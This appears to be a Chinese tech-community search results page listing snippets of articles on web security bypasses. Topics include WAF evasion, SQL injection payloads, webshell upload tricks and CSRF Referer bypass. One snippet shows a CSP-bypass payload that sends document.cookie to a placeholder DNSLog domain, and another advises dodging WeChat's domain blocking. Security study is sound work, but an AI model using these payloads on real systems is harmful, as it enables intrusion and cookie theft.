- 综合排序
- 最热优先
- 最新优先
- 来自专栏白安全组
burpsuite绕过网站拦截小技巧
有些网站为了安全性,会禁止用户使用burp并进行拦截。 大家都知道我们的burp开启后可以访问http://burp/来下载证书。 拦截burp的原理会根据网站会利用代码通过用户本地能加载burp的图标http://burp/favicon.ico,或者可以访问http://burp/ 我们解决这个只需要关闭这个功能即可 (勾上是关闭
3.5K20编辑于 2022-12-01 - 来自专栏全栈工程师修炼之路
WAF安全拦截绕过思路和手法
0x00 介绍前言 收集之中 WAF绕过方法: HPP(参数污染)方式 判断注入: xor 可直接过大部分的防护(包括安全狗) order by 大部分WAF默认拦截(包括安全狗) union 不拦截 select 不拦截 union selec 不拦截 union select 拦截 注:以上是在GET方式下的结果 POST下: and 不拦截 union select 不拦截 底线为↓ union select 1,2 from 这里开始被拦截 实际上真正要绕过的是from是否被匹配 安全狗WAF ByPass之HPP应用 描述: 一个有趣的注入点(可以使用其绕过SafeDog) #正常访问 由于&id=x相当于 ,x 所以参数值的数字都会变成,数字(用post测试) id=1137 union select 1&id=2&id=3&id=4&id=5&id=6&id=7&id=8&id=9& union爆出显位字段 3 , 15 继续注入查账号密码 id=1137%20union%20select%201&id=2&id=admin&id=4&id=5&id=6&id=7&id=8&id=9&
1.4K20发布于 2020-10-23 - 来自专栏全栈工程师修炼之路
WAF安全拦截绕过思路和手法
0x00 介绍前言 收集之中 WAF绕过方法: HPP(参数污染)方式 判断注入: xor 可直接过大部分的防护(包括安全狗) order by 大部分WAF默认拦截(包括安全狗) union 不拦截 select 不拦截 union selec 不拦截 union select 拦截 注:以上是在GET方式下的结果 POST下: and 不拦截 union select 不拦截 底线为↓ union select 1,2 from 这里开始被拦截 实际上真正要绕过的是from是否被匹配 安全狗WAF ByPass之HPP应用 描述: 一个有趣的注入点(可以使用其绕过SafeDog) #正常访问 由于&id=x相当于 ,x 所以参数值的数字都会变成,数字(用post测试) id=1137 union select 1&id=2&id=3&id=4&id=5&id=6&id=7&id=8&id=9& union爆出显位字段 3 , 15 继续注入查账号密码 id=1137%20union%20select%201&id=2&id=admin&id=4&id=5&id=6&id=7&id=8&id=9&
71830编辑于 2022-09-29 微信域名拦截原理拆解+二级域名绕过技巧(2026实操版)| 私域引流防封指南
私域推广、引流从业者常遇微信域名拦截问题,轻则错失流量,重则损失营收。微信拦截并非随机,而是三重风控逻辑,二级域名能绕开拦截,核心是利用其“单域名拦截”特性。 关键细节:微信黑名单以“单域名”为单位,主域与二级域互不连带,这是二级域名绕拦的核心前提。 二、二级域名绕过微信拦截的5个实操技巧二级域名绕拦核心:单域名拦截特性+无需单独备案、可快速切换。以下技巧从基础到进阶。 技巧2:核心款——二级域名+跳板页(防封率90%+)结构:微信→合规二级域(跳板)→真实落地页。 五、总结微信域名拦截核心是“风控分层、单域拦截”,二级域名绕拦本质是合规前提下的风险分散。短期可通过“二级域名+跳板页+轮询”保障业务,长期需做好合规运营、优化配置,才能实现域名稳定,避免得不偿失。
65110编辑于 2026-04-10- 来自专栏洛米唯熊
扫目录+N多代理IP绕过拦截
:[0-9]{1,3}\.){3}[0-9]{1,3}:*[0-9]*)", r)#正则匹配IP for i in ip_proxy:#用for循环取出IP并赋予i print (i) 我们来继续看
2.3K10发布于 2020-04-08 - 来自专栏洛米唯熊
sqlmap+外部代理池绕过IP拦截
:[0-9]{1,3}\.){3}[0-9]{1,3})", r)#正则匹配出IP与端口port=re.findall("(:\d{1,5})", r)#正则匹配出IP与端口for i,j in zip :[0-9]{1,3}\.){3}[0-9]{1,3})", r)#正则匹配出IP与端口port=re.findall("(:\d{1,5})", r)#正则匹配出IP与端口for i,j in zip
1.9K30发布于 2020-04-12 - 来自专栏HACK学习
干货 | 最全的文件上传漏洞之WAF拦截绕过总结
大致步骤如下: 1.获取Request Header里的Content-Type值中获取boundary值2.根据第一步的boundary值,解析POST数据,获取文件名3.判断文件名是否在拦截黑名单内 /白名单外 了解了WAF如何对恶意文件进行拦截之后,我将常见的绕过方法分为如下几类,最后再使用目前最新版的安全狗进行绕过演示。 若WAF匹配文件名到换行截止,则可以绕过。 最后测出的结果如下,长度为3710个字符: image-20220122154848589 虽然并没有帮我们上传上去,但是可以成功绕过安全狗拦截。 image-20220122161340032 成功绕过。
16K67编辑于 2022-02-17 - 来自专栏FreeBuf
小米范系列渗透测试工具介绍
9、支持导入导出。 ? 工具三:小米范子域名收集工具:收集子域名(二级域名、三级域名、四级域名) 工作原理: 1、获取常用记录类型。 3、通过搜索引擎、获取其他接口查询二级域名(百度、必应、netcraft,可设置爬取线程也爬取条数) 4、通过字典爆破二级域名(可自定义线程数即字典)。 3、请求拦截、修改(此拦截并非使用代理的方式,不存在https安装证书的问题,但是有些地方也没有代理拦截那么方便)。 4、多个代理快速切换。 5、网页URL提取。 9、表单认证破解(模拟浏览器操作、输入账号密码然后点击登录或在密码框按回车键。 11、二级域名查询(调用netcraft)。
5.6K50发布于 2018-02-08 - 来自专栏网站漏洞修复
渗透测试公司 该如何检测CSRF漏洞 原
通常我们SINE安全在渗透测试客户网站是否存在csrf漏洞,首先采用点击的形式去测试漏洞,在一个网站功能上利用点击的方式绕过安全效验与拦截,从技术层面上来讲,点击的请求操作来自于信任的网站,是不会对csrf 再一个检测漏洞的方式更改请求方式,比如之前网站使用的都是get提交方式去请求网站的后端,我们可以伪造参数,抓包修改post提交方式发送过去,就可以绕过网站之前的安全防护,直接执行CSRF恶意代码,漏洞产生的原因就是 ,网站开发者只针对了GET请求方式进行安全拦截,并没有对post的方式进行拦截,导致漏洞的发生。 有些客户网站使用了token来防止XSS跨站的攻击,在设计token的时候没有考虑到空值是否可以绕过的问题,导致可以token为空,就可以直接将恶意代码传入到后端中去。 对referer字段进行安全效验,检查URL是否是白名单里的,对于referer为空直接拦截掉该请求,URL的白名单要含有WWW,拒绝二级域名的请求。
1.2K10发布于 2019-09-08 - 来自专栏网站漏洞修补
渗透测试服务 针对CSRF漏洞检测与代码防御办法
通常我们SINE安全在渗透测试客户网站是否存在csrf漏洞,首先采用点击的形式去测试漏洞,在一个网站功能上利用点击的方式绕过安全效验与拦截,从技术层面上来讲,点击的请求操作来自于信任的网站,是不会对csrf 再一个检测漏洞的方式更改请求方式,比如之前网站使用的都是get提交方式去请求网站的后端,我们可以伪造参数,抓包修改post提交方式发送过去,就可以绕过网站之前的安全防护,直接执行CSRF恶意代码,漏洞产生的原因就是 ,网站开发者只针对了GET请求方式进行安全拦截,并没有对post的方式进行拦截,导致漏洞的发生。 有些客户网站使用了token来防止XSS跨站的攻击,在设计token的时候没有考虑到空值是否可以绕过的问题,导致可以token为空,就可以直接将恶意代码传入到后端中去。 对referer字段进行安全效验,检查URL是否是白名单里的,对于referer为空直接拦截掉该请求,URL的白名单要含有WWW,拒绝二级域名的请求。
76840发布于 2019-09-06 - 来自专栏世荣的博客
DNSLog的使用方法
我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级域名甚至三级域名上去请求,就可以通过DNS解析日志来获取它们。 场景三:XSS绕过CSP CSP(内容安全策略)是防御XSS最有效的手段之一。 当我们发现一个网站有XSS漏洞,想利用XSS平台来打Cookie时,CSP会通过白名单的方式禁止跨域加载脚本,恶意代码会被拦截,导致XSS无法利用。 这里,我们通过DNS解析突破CSP的拦截。 由于DNS预解析可以绕过CSP进行解析,结合DNSLOG,我们即可窃取在CSP保护下的Cookie。 document.cookie.split(/;|=/)[1]) + ".your-dnslog.com'>" 上面的Payload将Cookie中截取的重要字段进行简单的base64编码后,作为我们DNSLOG平台的二级域名
4.6K20编辑于 2022-03-21 - 来自专栏字节脉搏实验室
WAF的那点事
硬件型WAF 以硬件形式部署在链路中,支持多种部署方式,当串联到链路中时可以拦截恶意流量,在旁路监听模式时只记录攻击不进行拦截。 WAF方法 例如SQL注入漏洞绕过 1.大小写混合 在规则匹配时只针对特定大写或小写的情况,遇到时可以使用大小写混合绕过。 3.替换关键字 WAF采用替换或者删除select等敏感关键字的时候,如果只匹配一次则很容易进行绕过。 select polygon((select*from(select*from()a)b)); 7.寻找网站源站IP 对于有些waf防护的网站而言,可以找到真实ip地址,然后通过ip访问就可以进行绕过 ③找网站的二级域名、NS、MX记录等对应的IP。 ④使网站发送邮件给你,查看发送方的IP。
1.1K10发布于 2020-04-14 - 来自专栏农夫安全
CSRF--花式绕过Referer技巧
CSRF--花式绕过Referer技巧 CSRF遇到Referer绕过的情况,有条件限制,不一定所有的Refere验证就可以绕过 1.referer条件为空条件时 解决方案: 利用ftp:/ 例: 1.利用data:协议 <html> <body> <iframe src="data:text/html;base64,PGZvcm0gbWV0aG<em>9</em>kPXBvc3QgYWN0aW<em>9</em>uPWh0dHA6Ly<em>9</em>hLmIuY29tL2Q +PGlucHV0IHR5cGU<em>9</em>dGV4dCBuYW1lPSdpZCcgdmFsdWU<em>9</em>JzEyMycvPjwvZm<em>9</em>ybT48c2NyaXB0PmRvY3VtZW50LmZvcm1zWzBdLnN1Ym1pdCgpOzwvc2NyaXB0Pg 比如你找的csrf是xxx.com 验证的referer是验证的*.xx.com 可以找个<em>二级域名</em> 之后<img "csrf地址"> 之后在把文章地址发出去 就可以伪造。 鉴于此,系统开发者可以在HTTP请求中以参数的形式加入一个随机产生的token,并在服务器端建立一个拦截器来验证这个token,如果请求中没有token或者token内容不正确,则认为可能是CSRF攻击而拒绝该请求
3.2K10发布于 2019-04-19 - 来自专栏FreeBuf
绕过网站安全狗拦截,上传Webshell技巧总结 | 附免杀PHP一句话
*本文原创作者:1_2,本文属FreeBuf原创奖励计划,未经许可禁止转载 这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。 思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。 废话不多说,切入正题。。。。 > 因为此次实验的目的是绕过网站安全狗,所以PHP源码上我没做任何检测,把上传的文件直接放在upload目录下。 3、先看一下正常的HTTP请求: ? 很明显,文件名为”yijuhua.php”被拦截。。。。 4、尝试%00截断: ? 很明显,失败了。。。 绕过网站安全狗的拦截,成功上传WebShell。。。 (2)删除Content-Disposition字段里的空格: ? ? ? (3)修改Content-Disposition字段值的大小写: ?
2.3K90发布于 2018-02-09 - 来自专栏FreeBuf
iOS 9漏洞:利用Siri绕过锁屏访问私人图片和联系人
一名黑客发现了一个新的、非常简单的方法,该方法利用了苹果的私人助理Siri,绕过运行iOS 9的锁屏iOS设备(iPhone、iPad或iPod touch)的安全机制,这使得攻击者在30秒或许更短时间内就能访问设备中的照片和联系人 iOS 9曝密码绕过漏洞 通常来说,在你的iPhone手机上设置密码,就是能助你防止别人访问你的设备的第一道防线。 现在,一名黑客已经发现了一个新的、非常简单的方法来绕过运行苹果最新的iOS9操作系统的锁屏iOS设备(iPhone、iPad或iPod touch)的安全机制,这使得攻击者在30秒或许更短时间内就能访问设备中的照片和联系人 绕过密码的步骤 对于任何运行iOS 9.0系统的iOS设备上的密码,你只需要按照下面几个简单的步骤就能绕过它: 1、唤醒iOS设备并四次输入错误的密码。 然而,这样一个简单绕过任何锁定的iOS设备的方法将使用户私人数据处于风险之中。
2K90发布于 2018-02-06 - 来自专栏私人订制
SSM博客实战(9)-拦截器验证权限和登录与注销的实现
本文将介绍通过拦截器验证权限和后台登录与注销。 拦截器的作用在于,比如我们输入 xxx.com/admin 发起请求进入 网站后台或者其他后台页面。 我们的拦截器会在 Controller 调用之前进行拦截,至于什么拦截,由我们来写。比如,判断用户是否登录(可以通过 session 判断),如果没有登录,我们让它跳转到登录页面。 一、拦截器的基本使用 1、新建一个 拦截器 SecurityInterceptor.java package com.liuyanzhao.blog.Interceptor; import org.springframework.web.servlet.HandlerInterceptor 判断是否有 userId 这个session,如果没有(或者过期了)转发到登录页面 2、配置 springmvc.xml 通过使用 mvc:interceptors 标签来声明需要加入到SpringMVC拦截器链中的拦截器 最后,如果验证通过,将跳转到 xxx.com/admin 页面(当然后台需要加入session,否则拦截器会拦截)。
75810编辑于 2023-05-10 - 来自专栏信安之路
Clickjacking简单介绍
对于使用parent.location来防御的可以使用多层嵌套的方式绕过。 IE的xss筛选器自动拦截了跳转。 斯坦福的文章里写了Chrome也会出现这种情况,并给出了攻击代码: <iframe src=http://www.victim.com/?v=if(top+! %3D+self)+%7B+top.location%3Dself.location%3B+%7D"> 但是测试发现,新版的Chrome并不会拦截了,会直接跳转过去。 aaa.com")==1) { top.location.replace(document.location.href); } } 判断字符串中是否含有本域名是常见的错误用法,利用二级域名的方式便可绕过 x-frame-options:DENY 应该就没什么问题了 另外 iframe里添加sandbox=可以禁止js,进而阻止掉js的防御方式 在IE9下当设置restricted后似乎不发送cookie
1.4K00发布于 2018-08-08 - 来自专栏HACK学习
如何绕过cdn获取网站真实ip进行测试
导语:一般网站会使用cdn防御,我们访问时会经过cdn再经过源站服务器,这样我们进行渗透测试很容易被拦截,我们的思路是这样的,通过找到源站ip之后,把IP添加到hosts文件里面去;你访问网站返回的就是真实 不了解什么是hosts文件可以看下这篇文章:hosts文件的前世今生【https://jingyan.baidu.com/article/9f7e7ec04dacc06f281554dd.html】 怎么判断网站有没有 接下来就好办了,找到真实IP后把IP添加到hosts文件里面去;你访问网站返回的就是真实IP了,连接一句话就没有拦截了;接下来你就可以为所欲为了 2、通过各种方法找到二级域名,因为基本上站长不会把全部二级域名都做
3.3K30发布于 2019-08-07 - 来自专栏雨落秋垣
WAF绕过技术全面解析:从原理到实践方案(简易版)
WAF通常部署在Web应用程序和客户端之间,像一座"智能安检门"检查所有进出网站的流量,核心任务包括拦截攻击(如SQL注入、XSS)、过滤异常请求(如CC攻击)以及通过"虚拟补丁"临时隐藏漏洞。 的工作流程可分为四个关键阶段:预处理阶段:判断请求是否为HTTP/HTTPS,检查URL是否在白名单中规则检测阶段:将解析后的数据包与预置规则库进行匹配处理模块:根据检测结果执行放行、阻断或告警操作日志记录:记录所有拦截和处理日志供后续分析绕过 以下是几种有效的真实IP发现方法:二级域名与其他域名解析记录:查找同一域名注册者下的其他域名解析记录,特别是未接入WAF的二级域名(如test.example.com、dev.example.com)可能直接解析到真实 :部分WAF对搜索引擎爬虫或特定IP段(如公司内网)设置白名单,伪装成这些可信来源可能绕过检测表:网络架构层绕过技术对比技术方法适用场景实施难度隐蔽性所需工具二级域名解析存在未防护子域名低中dig/nslookupMX 记录邮件服务器与Web服务器分离,MX记录不指向业务IP使用网络层ACL限制非HTTP/HTTPS流量访问Web服务器考虑混合部署模式:云WAF+本地硬件WAF形成多层次防护监控与日志分析:记录所有被拦截请求的原始数据
97100编辑于 2025-12-15 - 来自专栏网络安全攻防
泛微E9路径browser.jsp存在权限绕过导致SQL注入漏洞
一、漏洞描述 这是一个组合漏洞,权限绕过 + 后台sql注入漏洞。 二、漏洞分析 2.1 登录绕过分析 从互联网得知,漏洞路径为/mobile/plugin/browser.jsp。 访问这个路径,无法访问 那么就需要分析哪里拦截了这个请求,或者说哪里进行了权限验证。这种验证通常需要登录,或者有一定的权限。不了解项目架构的时候,我们就通过关键字搜索来找到对应的信息。 这里少了个空格的验证,那么我们就可以利用空格来绕过必须登录的验证。 listRemindType会返回所有结果 漏洞复现 传入payload: a' union select 1,''+(SELECT @@VERSION)+' 返回数据库版本的报错信息 三、总结 java web应用登录绕过 ,其中一类都是通过一些列自定义的规则验证请求的URL,然后配合APACHE的一些特性,绕过原有的规则限制,达到认证绕过的目的。
60100编辑于 2025-04-18
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号